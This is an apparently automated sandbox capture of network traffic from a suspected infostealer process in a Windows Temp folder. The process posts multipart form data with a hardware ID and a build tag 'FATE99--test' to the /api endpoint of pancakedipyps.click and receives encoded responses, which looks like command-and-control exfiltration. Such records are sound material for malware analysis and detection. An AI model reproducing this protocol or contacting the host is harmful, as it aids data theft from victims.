                                                                                                                                                              Date: Wed, 18 Dec 2024 10:48:08 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=fia53cjd58vtsj2qv0rktuko24; expires=Sun, 13-Apr-2025 04:34:46 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6wJscHg7L4RTX3gx9knqaTcINyG0%2BrLWQufmEF973W%2BNThQmNLCJtOy2NpfQmNGPQOTvprYizp0ffxN5Tom84xCCIf6l9HTFsGaw0QoOWLMw9%2F3yr5YruTE7Y3pxBEeBOBMCOsnu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f3e9423491f43b0-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1773&rtt_var=668&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=949&delivery_rate=1646926&cwnd=32&unsent_bytes=0&cid=02d3ab6670e3741c&ts=2168&x=0"
                                                                                                                                                              2024-12-18 10:48:08 UTC333INData Raw: 34 64 38 0d 0a 59 66 68 49 46 6f 75 59 66 41 64 38 73 37 37 30 6c 39 6f 37 70 7a 73 38 70 6a 37 49 73 77 42 48 75 6b 50 6d 77 65 4f 49 7a 48 34 61 32 6a 34 30 73 61 78 51 4a 51 2f 57 6e 4d 37 6a 71 45 37 43 46 78 37 48 57 75 71 4a 5a 69 62 57 4d 49 50 74 77 66 36 68 58 46 75 65 4b 58 72 34 2f 56 41 6c 47 63 75 63 7a 73 79 68 47 63 4a 56 48 70 77 63 72 64 6c 69 4a 74 59 68 68 36 71 4d 2b 4b 41 64 43 5a 51 76 66 75 37 37 47 47 59 51 33 74 75 52 38 72 74 52 79 56 4a 52 7a 6c 50 71 6e 79 49 69 77 47 48 63 34 36 37 74 75 42 38 73 6d 54 74 39 71 65 56 51 66 46 37 57 30 4e 61 74 2b 46 72 43 57 56 44 41 57 71 50 62 61 43 2f 65 49 49 4b 72 6b 2b 47 71 46 67 6d 61 4c 48 2f 6b 38 67 78 72 47 74 6e 51 6c 2f 69 37 47 59 73 5a 57 64 77 63 38 70 45 78 46 39 73 77 6c 62
                                                                                                                                                              Data Ascii: 4d8YfhIFouYfAd8s770l9o7pzs8pj7IswBHukPmweOIzH4a2j40saxQJQ/WnM7jqE7CFx7HWuqJZibWMIPtwf6hXFueKXr4/VAlGcuczsyhGcJVHpwcrdliJtYhh6qM+KAdCZQvfu77GGYQ3tuR8rtRyVJRzlPqnyIiwGHc467tuB8smTt9qeVQfF7W0Nat+FrCWVDAWqPbaC/eIIKrk+GqFgmaLH/k8gxrGtnQl/i7GYsZWdwc8pExF9swlb
                                                                                                                                                              2024-12-18 10:48:08 UTC914INData Raw: 62 7a 53 59 50 73 71 36 77 65 32 69 58 46 76 61 4c 48 72 6f 39 78 35 33 46 74 72 58 6b 2b 65 7a 55 4d 68 55 58 73 6c 57 70 64 4a 69 49 74 49 72 69 36 6d 46 35 36 4d 61 41 35 70 71 4f 71 6e 39 42 69 56 47 6b 66 2b 54 35 62 39 56 30 78 74 6b 68 45 50 6b 79 43 49 69 31 47 48 63 34 34 6e 76 72 52 38 49 6c 53 6c 38 34 75 67 65 64 78 6a 63 32 59 54 7a 76 56 66 50 57 6b 7a 4f 55 71 7a 53 61 79 37 52 4a 49 4f 6e 77 61 54 75 47 78 76 61 63 6a 54 49 39 78 56 70 46 4d 62 63 31 75 72 32 51 49 56 65 55 6f 51 45 36 74 56 6a 49 64 6b 6c 69 71 32 46 35 71 67 53 44 70 55 73 66 75 6e 39 46 47 30 57 30 4e 47 64 2b 72 68 63 79 46 31 59 79 46 32 76 6b 53 78 6c 33 7a 6e 45 2b 38 48 45 71 52 38 52 32 42 39 33 35 2f 51 5a 63 31 37 4f 6b 6f 2b 31 76 31 57 46 41 52 37 4b 57 61 58
                                                                                                                                                              Data Ascii: bzSYPsq6we2iXFvaLHro9x53FtrXk+ezUMhUXslWpdJiItIri6mF56MaA5pqOqn9BiVGkf+T5b9V0xtkhEPkyCIi1GHc44nvrR8IlSl84ugedxjc2YTzvVfPWkzOUqzSay7RJIOnwaTuGxvacjTI9xVpFMbc1ur2QIVeUoQE6tVjIdkliq2F5qgSDpUsfun9FG0W0NGd+rhcyF1YyF2vkSxl3znE+8HEqR8R2B935/QZc17Oko+1v1WFAR7KWaX
                                                                                                                                                              2024-12-18 10:48:08 UTC1369INData Raw: 34 34 34 34 0d 0a 4b 33 66 70 38 42 42 71 46 4e 6e 55 6c 76 69 35 55 73 31 66 55 38 39 54 70 64 5a 71 4a 74 51 6b 69 61 44 42 70 4f 34 62 47 39 70 79 4e 4d 7a 30 48 58 51 50 6b 2b 6d 56 2b 37 5a 65 30 78 6c 42 69 6b 58 71 31 6d 35 6c 67 47 47 4f 70 49 62 75 6f 78 59 41 6e 69 35 35 35 76 4d 58 62 41 7a 62 30 4a 6a 6e 74 56 50 41 56 31 4c 42 55 36 72 51 59 79 76 53 4b 73 54 74 77 65 32 32 58 46 76 61 42 58 6e 35 36 42 52 75 44 35 50 70 6c 66 75 32 58 74 4d 5a 51 59 70 46 36 74 5a 75 5a 59 42 68 6a 36 57 4e 35 71 34 61 45 5a 51 6c 5a 75 50 6f 47 6d 73 61 33 64 4b 66 2b 4c 64 63 31 31 31 65 31 6c 32 76 31 6d 77 6f 79 69 54 45 37 63 48 74 74 6c 78 62 32 68 42 41 37 75 6f 50 59 6c 7a 6b 33 35 6a 37 76 30 2b 46 52 68 44 64 48 4b 33 64 49 6e 32 59 49 6f 69 75 69
                                                                                                                                                              Data Ascii: 4444K3fp8BBqFNnUlvi5Us1fU89TpdZqJtQkiaDBpO4bG9pyNMz0HXQPk+mV+7Ze0xlBikXq1m5lgGGOpIbuoxYAni555vMXbAzb0JjntVPAV1LBU6rQYyvSKsTtwe22XFvaBXn56BRuD5Pplfu2XtMZQYpF6tZuZYBhj6WN5q4aEZQlZuPoGmsa3dKf+Ldc111e1l2v1mwoyiTE7cHttlxb2hBA7uoPYlzk35j7v0+FRhDdHK3dIn2YIoiui
                                                                                                                                                              2024-12-18 10:48:08 UTC1369INData Raw: 50 32 6e 49 30 34 2b 67 62 61 78 72 62 32 5a 4c 35 73 6c 6e 41 53 31 62 43 57 36 62 5a 5a 79 72 65 4a 49 6d 6b 69 75 6d 38 44 67 43 65 4a 48 69 70 74 46 35 69 42 70 47 45 31 74 43 76 57 74 56 66 58 59 52 44 35 4d 67 69 49 74 52 68 33 4f 4f 42 35 4b 49 58 42 4a 45 68 63 4f 33 36 45 32 34 51 33 39 57 61 2f 62 52 65 31 31 52 62 7a 46 61 6a 31 47 34 6f 32 7a 4f 48 6f 73 47 6b 37 68 73 62 32 6e 49 30 7a 73 6b 70 52 6c 37 4f 6b 6f 2b 31 76 31 57 46 41 52 37 46 56 4b 33 66 5a 6a 66 57 4d 34 71 6b 67 65 79 6d 46 41 53 57 4a 48 72 37 38 68 39 6c 45 4e 37 55 6e 2f 47 35 58 63 46 56 57 59 51 53 36 74 5a 36 5a 59 42 68 72 4b 43 62 38 4f 77 79 43 4a 6f 74 5a 50 2f 68 58 6e 70 51 79 4a 79 52 2b 66 67 42 68 56 31 56 7a 6c 57 70 32 47 59 6f 32 43 69 4c 71 6f 6e 6e 70 67
                                                                                                                                                              Data Ascii: P2nI04+gbaxrb2ZL5slnAS1bCW6bZZyreJImkium8DgCeJHiptF5iBpGE1tCvWtVfXYRD5MgiItRh3OOB5KIXBJEhcO36E24Q39Wa/bRe11RbzFaj1G4o2zOHosGk7hsb2nI0zskpRl7Oko+1v1WFAR7FVK3fZjfWM4qkgeymFASWJHr78h9lEN7Un/G5XcFVWYQS6tZ6ZYBhrKCb8OwyCJotZP/hXnpQyJyR+fgBhV1VzlWp2GYo2CiLqonnpg
                                                                                                                                                              2024-12-18 10:48:08 UTC1369INData Raw: 63 66 76 39 45 6d 38 52 30 74 53 62 39 72 42 4c 78 56 52 65 31 6b 36 73 32 6d 78 6c 6c 6d 47 44 75 38 47 79 37 69 30 55 6b 57 70 72 70 2b 4e 65 59 68 4b 52 68 4e 62 32 73 6c 54 4c 53 31 72 43 56 36 6e 66 61 69 44 51 4a 59 36 75 6a 75 47 6b 46 51 75 61 4a 58 48 68 38 52 68 72 48 39 66 51 6d 37 58 32 47 63 4a 42 48 70 77 63 6a 63 74 76 49 38 38 77 73 61 53 42 75 2b 34 44 54 59 4e 71 63 2b 57 36 52 69 55 54 33 64 61 62 38 4c 78 52 77 6c 70 66 79 46 69 6e 33 47 59 73 33 43 53 57 73 59 66 6b 72 68 4d 4e 6c 53 5a 6d 35 2f 38 65 61 56 36 66 6e 4a 48 74 2b 41 47 46 61 45 6e 45 48 4c 57 66 65 32 58 66 4c 63 54 37 77 65 57 6a 44 67 2b 56 4b 6e 58 71 2f 68 56 69 47 4e 66 64 6c 66 43 37 58 4d 4e 59 58 73 68 57 72 64 6c 6f 4b 39 55 6e 67 4b 57 48 71 75 42 63 42 49 4a
                                                                                                                                                              Data Ascii: cfv9Em8R0tSb9rBLxVRe1k6s2mxllmGDu8Gy7i0UkWprp+NeYhKRhNb2slTLS1rCV6nfaiDQJY6ujuGkFQuaJXHh8RhrH9fQm7X2GcJBHpwcjctvI88wsaSBu+4DTYNqc+W6RiUT3dab8LxRwlpfyFin3GYs3CSWsYfkrhMNlSZm5/8eaV6fnJHt+AGFaEnEHLWfe2XfLcT7weWjDg+VKnXq/hViGNfdlfC7XMNYXshWrdloK9UngKWHquBcBIJ
                                                                                                                                                              2024-12-18 10:48:08 UTC1369INData Raw: 78 70 72 47 74 62 63 6d 76 71 2f 55 63 70 64 58 73 73 63 35 4a 46 6c 50 5a 68 35 78 49 4f 4b 2f 49 38 53 43 49 68 71 61 36 66 6a 58 6d 49 53 6b 59 54 57 2b 37 46 59 7a 56 64 53 7a 46 69 34 30 57 6b 73 31 79 43 4c 6f 34 4c 72 70 42 51 52 6e 43 70 2f 34 66 30 57 59 52 44 44 33 5a 6d 31 39 68 6e 43 51 52 36 63 48 4a 76 48 5a 53 4c 58 59 36 32 6b 6d 75 75 6b 48 77 69 57 61 6d 75 6e 34 31 35 69 45 70 47 45 31 76 69 30 56 4d 46 4c 55 73 52 63 6f 39 5a 6f 4e 39 63 75 69 61 43 42 37 37 77 64 45 5a 55 68 63 65 72 2b 45 57 6f 53 32 64 62 57 75 2f 68 65 33 52 6b 47 68 48 43 70 77 47 68 6e 2f 7a 75 53 70 49 33 37 70 52 45 50 32 6a 55 36 38 4c 6f 5a 61 56 36 4a 6e 4a 62 30 74 55 76 41 57 46 54 4f 55 61 4c 65 5a 79 44 58 4a 59 43 6f 6a 2f 69 67 45 77 4f 63 49 58 58 73
                                                                                                                                                              Data Ascii: xprGtbcmvq/UcpdXssc5JFlPZh5xIOK/I8SCIhqa6fjXmISkYTW+7FYzVdSzFi40Wks1yCLo4LrpBQRnCp/4f0WYRDD3Zm19hnCQR6cHJvHZSLXY62kmuukHwiWamun415iEpGE1vi0VMFLUsRco9ZoN9cuiaCB77wdEZUhcer+EWoS2dbWu/he3RkGhHCpwGhn/zuSpI37pREP2jU68LoZaV6JnJb0tUvAWFTOUaLeZyDXJYCoj/igEwOcIXXs
                                                                                                                                                              2024-12-18 10:48:08 UTC1369INData Raw: 48 66 30 5a 33 78 73 56 7a 4e 57 6c 76 42 56 71 62 64 59 79 33 52 4b 34 47 6d 68 2b 43 74 45 67 79 62 4a 6e 44 67 39 42 63 6c 55 4a 48 62 6a 72 58 67 47 66 4e 4a 57 64 78 52 75 70 4e 51 4a 73 6b 77 6b 61 36 52 37 4f 77 7a 41 4a 59 70 63 65 37 71 58 6e 70 51 79 4a 79 52 2b 66 67 42 68 56 6c 61 79 46 2b 74 33 32 30 6f 31 79 61 50 72 49 76 6b 76 42 4d 47 6b 69 5a 38 35 4f 67 55 62 77 7a 59 31 5a 76 37 73 45 76 47 47 52 43 45 57 37 4b 52 4f 6d 58 71 4b 34 65 76 6c 2b 65 68 58 42 7a 55 4d 7a 54 75 39 6c 34 39 58 73 50 4f 6c 76 36 34 58 73 74 4c 58 38 78 54 6f 4e 46 6b 4c 74 49 69 6a 61 65 50 34 36 67 64 44 70 73 72 64 4f 7a 36 46 33 63 54 6b 5a 4c 57 38 71 41 5a 6e 52 6c 70 79 46 65 62 30 6e 52 6c 78 32 2b 64 34 34 62 6d 37 6b 52 44 6d 7a 68 35 34 66 34 65 61
                                                                                                                                                              Data Ascii: Hf0Z3xsVzNWlvBVqbdYy3RK4Gmh+CtEgybJnDg9BclUJHbjrXgGfNJWdxRupNQJskwka6R7OwzAJYpce7qXnpQyJyR+fgBhVlayF+t320o1yaPrIvkvBMGkiZ85OgUbwzY1Zv7sEvGGRCEW7KROmXqK4evl+ehXBzUMzTu9l49XsPOlv64XstLX8xToNFkLtIijaeP46gdDpsrdOz6F3cTkZLW8qAZnRlpyFeb0nRlx2+d44bm7kRDmzh54f4ea
                                                                                                                                                              2024-12-18 10:48:08 UTC1369INData Raw: 57 72 65 6f 58 68 55 73 65 6e 42 7a 74 30 6e 41 33 33 69 4b 53 6f 4d 62 55 6b 44 77 49 6a 43 74 35 34 76 59 67 57 77 76 53 30 70 6a 79 72 6b 69 46 46 78 37 4c 48 50 4c 6f 49 6d 32 59 48 73 72 6a 6d 61 72 32 58 44 61 5a 4a 48 72 75 37 41 38 6f 50 74 72 4b 6c 2f 69 7a 56 59 64 59 55 39 52 62 36 70 38 69 49 35 68 35 31 4f 33 42 37 72 39 63 57 38 70 34 4c 37 79 70 53 54 56 4d 7a 70 4b 50 74 61 34 5a 6e 51 73 51 68 45 37 71 69 53 4a 69 32 7a 4f 57 70 59 4c 38 72 56 73 39 70 41 70 2f 35 66 6b 53 5a 42 6d 52 6b 74 62 36 2b 41 48 38 47 56 33 57 54 75 58 41 64 43 6a 49 4a 73 69 72 6b 4f 65 69 58 45 33 61 5a 6e 44 69 39 68 74 69 44 70 37 4f 68 76 36 30 54 34 6c 64 54 49 51 53 36 73 42 70 4b 73 6f 76 67 2b 79 51 2f 4b 4d 4d 41 4a 38 74 4f 4f 48 72 45 32 6c 65 6e 35
                                                                                                                                                              Data Ascii: WreoXhUsenBzt0nA33iKSoMbUkDwIjCt54vYgWwvS0pjyrkiFFx7LHPLoIm2YHsrjmar2XDaZJHru7A8oPtrKl/izVYdYU9Rb6p8iI5h51O3B7r9cW8p4L7ypSTVMzpKPta4ZnQsQhE7qiSJi2zOWpYL8rVs9pAp/5fkSZBmRktb6+AH8GV3WTuXAdCjIJsirkOeiXE3aZnDi9htiDp7Ohv60T4ldTIQS6sBpKsovg+yQ/KMMAJ8tOOHrE2len5
                                                                                                                                                              2024-12-18 10:48:08 UTC1369INData Raw: 59 49 56 49 56 4d 4d 51 34 70 31 7a 4e 74 59 71 6b 71 54 42 31 65 42 63 47 39 70 79 4e 4e 7a 35 45 47 73 5a 78 38 33 62 30 37 74 65 77 31 70 51 30 30 33 71 6e 79 49 6a 6d 48 6e 57 37 63 48 75 76 31 78 62 79 6e 67 76 76 4b 6c 4a 4e 55 7a 4f 6b 6f 2b 31 72 68 6d 64 43 68 43 45 54 75 71 4a 49 6d 4c 57 4c 49 57 67 6a 2b 6d 38 44 67 57 5a 50 48 65 75 78 43 42 41 45 39 7a 5a 6d 50 4b 47 5a 2b 52 54 54 73 6c 54 72 65 39 63 45 73 6b 6d 6c 4f 47 6e 36 62 67 66 51 39 52 71 62 4b 6d 69 58 6b 51 55 77 64 47 5a 38 76 67 58 68 56 30 65 6e 42 79 50 33 47 38 67 31 69 62 47 67 6f 76 36 6f 78 4d 45 32 6d 51 30 35 62 70 47 4a 52 2f 62 7a 4a 76 36 76 78 58 43 51 31 6d 45 45 75 72 66 49 6e 32 59 49 49 36 7a 6a 4f 57 70 55 41 57 55 4a 44 54 32 74 41 63 6c 43 4a 47 45 78 62 76
                                                                                                                                                              Data Ascii: YIVIVMMQ4p1zNtYqkqTB1eBcG9pyNNz5EGsZx83b07tew1pQ003qnyIjmHnW7cHuv1xbyngvvKlJNUzOko+1rhmdChCETuqJImLWLIWgj+m8DgWZPHeuxCBAE9zZmPKGZ+RTTslTre9cEskmlOGn6bgfQ9RqbKmiXkQUwdGZ8vgXhV0enByP3G8g1ibGgov6oxME2mQ05bpGJR/bzJv6vxXCQ1mEEurfIn2YII6zjOWpUAWUJDT2tAclCJGExbv


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              4192.168.2.649955172.67.209.2024434544C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-12-18 10:48:11 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: multipart/form-data; boundary=74PNI4XZW2S
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 12816
                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                              2024-12-18 10:48:11 UTC12816OUTData Raw: 2d 2d 37 34 50 4e 49 34 58 5a 57 32 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 31 36 42 30 33 45 37 42 33 36 33 41 46 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 37 34 50 4e 49 34 58 5a 57 32 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 34 50 4e 49 34 58 5a 57 32 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 37 34 50 4e 49 34 58 5a 57 32 53 0d 0a 43 6f 6e 74 65
                                                                                                                                                              Data Ascii: --74PNI4XZW2SContent-Disposition: form-data; name="hwid"F716B03E7B363AF1AC8923850305D13E--74PNI4XZW2SContent-Disposition: form-data; name="pid"2--74PNI4XZW2SContent-Disposition: form-data; name="lid"FATE99--test--74PNI4XZW2SConte
                                                                                                                                                              2024-12-18 10:48:13 UTC1048INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:48:13 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=mpqeft7ojaf4420gh96igkios3; expires=Sun, 13-Apr-2025 04:34:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Xdj9bw%2FhKM01uu9OqDtZsFp%2BCdBrTyG%2Fi2wV0YtA8imtFavl3mcPXprt1o6sZb%2BWm%2BZYPpUB2p5S45nw%2F3jfzZNZO3gPTe3SoWAliUQJHFNOVEfh90828Ex2JtyiPtLKts5SJ%2Bc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f3e943e2b5a420a-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1550&min_rtt=1541&rtt_var=597&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2847&recv_bytes=13752&delivery_rate=1803582&cwnd=251&unsent_bytes=0&cid=3f315f6e137dc8ce&ts=2748&x=0"
                                                                                                                                                              2024-12-18 10:48:13 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                              2024-12-18 10:48:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              5192.168.2.649967172.67.209.2024434544C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-12-18 10:48:15 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: multipart/form-data; boundary=28WX2WOCTWQ107PD
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 15092
                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                              2024-12-18 10:48:15 UTC15092OUTData Raw: 2d 2d 32 38 57 58 32 57 4f 43 54 57 51 31 30 37 50 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 31 36 42 30 33 45 37 42 33 36 33 41 46 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 32 38 57 58 32 57 4f 43 54 57 51 31 30 37 50 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 38 57 58 32 57 4f 43 54 57 51 31 30 37 50 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 32 38 57
                                                                                                                                                              Data Ascii: --28WX2WOCTWQ107PDContent-Disposition: form-data; name="hwid"F716B03E7B363AF1AC8923850305D13E--28WX2WOCTWQ107PDContent-Disposition: form-data; name="pid"2--28WX2WOCTWQ107PDContent-Disposition: form-data; name="lid"FATE99--test--28W
                                                                                                                                                              2024-12-18 10:48:17 UTC1044INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:48:17 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=vbbfgkf1cmnmnr69prfb6h0aio; expires=Sun, 13-Apr-2025 04:34:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YR%2BCQTseAiHXp0FNagV6hg1Vj30V3y8EzXfB8dvQF0qWEGdUsjzeiwoG92wBCPYEV72rKzgO3DF4zcOrsOKZuss0MmJrm3x3vfdZBKp8iCL6UOYb8V2sMaxLicqPDU0r%2FMaNFO%2FP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f3e94598ca24291-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=17474&min_rtt=1596&rtt_var=10130&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2849&recv_bytes=16033&delivery_rate=1829573&cwnd=207&unsent_bytes=0&cid=1570f99318dc956a&ts=2164&x=0"
                                                                                                                                                              2024-12-18 10:48:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                              2024-12-18 10:48:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              6192.168.2.649978172.67.209.2024434544C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-12-18 10:48:19 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: multipart/form-data; boundary=GKNINE9LBXH7
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 19926
                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                              2024-12-18 10:48:19 UTC15331OUTData Raw: 2d 2d 47 4b 4e 49 4e 45 39 4c 42 58 48 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 31 36 42 30 33 45 37 42 33 36 33 41 46 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 47 4b 4e 49 4e 45 39 4c 42 58 48 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 4b 4e 49 4e 45 39 4c 42 58 48 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 47 4b 4e 49 4e 45 39 4c 42 58 48 37 0d 0a 43
                                                                                                                                                              Data Ascii: --GKNINE9LBXH7Content-Disposition: form-data; name="hwid"F716B03E7B363AF1AC8923850305D13E--GKNINE9LBXH7Content-Disposition: form-data; name="pid"3--GKNINE9LBXH7Content-Disposition: form-data; name="lid"FATE99--test--GKNINE9LBXH7C
                                                                                                                                                              2024-12-18 10:48:19 UTC4595OUTData Raw: 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii: +?2+?2+?o?Mp5p_oI
                                                                                                                                                              2024-12-18 10:48:20 UTC1043INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:48:20 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=u90fdoeh4ba661kh262dnodea2; expires=Sun, 13-Apr-2025 04:34:59 GMT; Max-Age=9999999; path=/
